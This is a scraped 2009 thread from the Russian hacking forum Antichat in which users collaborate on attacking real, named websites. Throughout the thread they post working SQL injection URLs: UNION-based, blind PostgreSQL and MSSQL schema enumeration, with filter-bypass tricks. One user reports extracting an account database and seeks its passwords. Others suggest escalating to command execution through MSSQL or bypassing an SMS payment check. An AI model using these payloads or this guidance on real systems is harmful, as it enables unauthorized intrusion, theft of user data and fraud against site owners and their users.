Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.03.2009, 22:41
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2
5.0.67-community
Сообщение от fedi
Получается во все эти базы зайти нельзя, не в одну? а как их тогда вообще открывают?
С ними работает сервер линейки я же написал. Сайт вообще мог бы быть построен на mysql и не иметь никакого отношения к л2 серверу. Впрочем иногда бывает что данные для статистики (как правило подробной, например в личном кабинете - содержимое инвентаря, количество пвп\пк) берется прямо из этих баз... здесь как видишь доступа к этим базам нету
Последний раз редактировалось ElteRUS; 15.03.2009 в 22:46..
|
|
|
15.03.2009, 22:42
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
@Imperou$
у меня Forbidden, попробуй регистрт UnIoN+sElEcT или union%0aselect
|
|
|
|
15.03.2009, 22:54
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463
Репутация:
97
|
|
Сообщение от ElteRUS
http://fantasysportsinsider.com/index.php?option=com_feeds&task=headline&headline=-141060/**/union/**/select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(), 16,17,18,19,20,21,22,23,24,25--+&totalItems=3709&pageID=2
5.0.67-community
ElteRUS я невнимательный идиот.Спасибо большое, а ларчик просто открывался 
|
|
|
|
16.03.2009, 00:32
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
http://www.customoutfitters.com/co_home/products.php?productCat=4
Стоит PostgreSql.Кто может раскрутить ? На все запросы к бд реагирует молча =_=
|
|
|
|
16.03.2009, 01:24
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((sel ect+version()),0,1))>1
PostgreSQL 8.1.3
http://www.customoutfitters.com/co_home/products.php?productCat=4+and+ascii(substring((sel ect+tablename+from+pg_tables+limit+1+offset+0),1,1 ))>1
Дальше сам
|
|
|
|
16.03.2009, 12:17
|
|
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874
Репутация:
1020
|
|
Сообщение от fedi
мне кажется что просто здесь идет филтр на from такое возможно? чем его можно заменить?
хоть я не очень дружу с MSSQL но так на вскидку:
смотрим базы доступные текушему пользователю(0- нет доступа, 1 - доступ есть):
PHP код:
http://darkomen.ru/?go=19&indx=-11+union+all+select+1,2,HAS_DBACCESS(DB_NAME(0)),4,5,6,7,DB_NAME(0),9,1,1,1--
lin2world - 1
master - 1
tempdb - 1
model - 0
msdb - 1
lin2db - 0
lin2comm - 0
l2gloss - 0
lin2world - 1
lin2log - 0
lin2clancomm - 0
смотрим таблички и колонки доступные текушему пользователю
PHP код:
http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QUOTENAME(TABLE_NAME),4,5,6,7,QUOTENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCHEMA.COLUMNS--
крч ничего особено хорошего нету.
|
|
|
|
16.03.2009, 13:19
|
|
Новичок
Регистрация: 25.02.2009
Сообщений: 4
Провел на форуме:
10495
Репутация:
0
|
|
Господа, помогите с таким вопросом.
На чем построена система скачки файлов сайта ... допустим http://ikino.by/ ?
Вот - http://ikino.by/download/ns_echelon_conspiracy_2009_dvdscr.avi.html сама система получения\верификации полученного по СМС кода.
Что это за система? На чем построена? Есть ли известные способы обхода данной системы?
Может кто что знает.
Заранее спасибо за ответ.
|
|
|
|
16.03.2009, 15:37
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913
Репутация:
3
|
|
Я вытащил базу аккаунтов, жалко паролей нету((
|
|
|
|
16.03.2009, 15:47
|
|
Новичок
Регистрация: 13.03.2009
Сообщений: 6
Провел на форуме:
18913
Репутация:
3
|
|
__http://darkomen.ru/?go=19&indx=-1+union+select+1,2,QU OTENAME(TABLE_NAME),4,5,6,7,Q UOT ENAME(COLUMN_NAME),9,1,1,1+from+INFORMATION_SCH EMA.C O LUMNS--
может кто нить подскажет к можно пароли найти? нашел все аккаунты их ид даты создания, а поролей и ящиков нету((
Последний раз редактировалось fedi; 16.03.2009 в 15:51..
|
|
|
|
16.03.2009, 15:51
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Тебе же популярно все обьяснили и разжували - нету доступа к определеным БД где скорее всего и храниться пароли и мыла и тп, копай теперь в направлении выполнения команд через mssql.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
